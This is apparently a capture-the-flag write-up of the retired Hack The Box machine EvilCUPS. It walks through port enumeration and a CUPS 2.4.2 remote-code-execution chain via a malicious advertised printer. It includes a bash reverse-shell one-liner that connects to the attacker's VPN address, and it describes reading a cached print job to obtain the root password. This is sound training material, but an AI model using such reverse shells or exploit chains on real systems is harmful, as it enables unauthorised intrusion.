EvilCPUs (HTB)

We are unbreakable

Intro.

Hello my fello friends it been a while since i post something but today we have a reitred HTB machine so we can have some fun here too SHALL WE !?.

---

Enumeration.

PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLhyWEKe+YMaLWwGVFwyHt8c6bWzFkIrhtFZYPkBfui0+1IrwnUmA3TZq1yQ9vN7Jn+Id6YxfaXO7CfraX69S/Y=
|   256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICsRxZMgAIyL7cg9PIv83wIGkMGjzbkzS1jktKqQ6Kij
631/tcp open  ipp     syn-ack ttl 63 CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2

So from this results we can see an uncomment port which is 631 let's see what it has.

Enumerate port 631.

So a quich search we can find that this port is an ( Internet Printing Protocol) which am not so familiar with it.

631 - Internet Printing Protocol(IPP) - HackTricksbook.hacktricks.xyz

So after some reading an. IPP : is a protocol uses HTTP post request to print over the network and manage the printer like shown status and more. CPUS (Common Unix Printing System): is an open source project which allows a computer to act as a printer for a unix based system and it is using IPP as its communication protocol

Getting shell.

So after a lot of search i found that the version of CUPs if vuln to a chain of attacks which results in RCE.

Attacking UNIX Systems via CUPS, Part Ievilsocket

evil-cups/evilcups.py at main · IppSec/evil-cupsGitHub

Thanks to these guys we are able to understand and exploit the vulnerable service and give a remote code execution.

Running this command will advertises an evil printer which going to be added to our printers in the website.

so pressing on this printer and test it our command will be executed.

and by then we should revive a connection from the machine.

Stable shell.

i face a problem where it would kill the shell in some period of time to solve this we can use nohub command and & as follow.

'nohub bash -c "bash -i >& /dev/tcp/<VPN-IP>/<PORT> 0>&1" &'

nohupWikipedia

simple explain of nohub. nohup is a POSIX command which means "no hang up". Its purpose is to execute a command such that it ignores the HUP (hangup) signal and therefore does not stop when the user logs out.

getting root.

so once we are in the machine we can see that the folder /var/spool/cpus which has the available printers, does not allow us to list so what we can do. after some search i found that we maybe able to guess the name of a cached job and read its content so what is the format of the cached jobs.

d<5 print number>-<3 page>

so from my understanding i think it refers to print number as a printer number and page is how many page it prints so let's test this.

and after some tries i get it.

am not sure if this was luck or it just the how it should be. but how care we get it. And in the file we would also see the password for the root user.

using this password are able to login as root.

Conclusion.

This machine was quite fun and interesting but the only issue the connection i faced a lot of connection issue but we get it at the end so fun. ☺️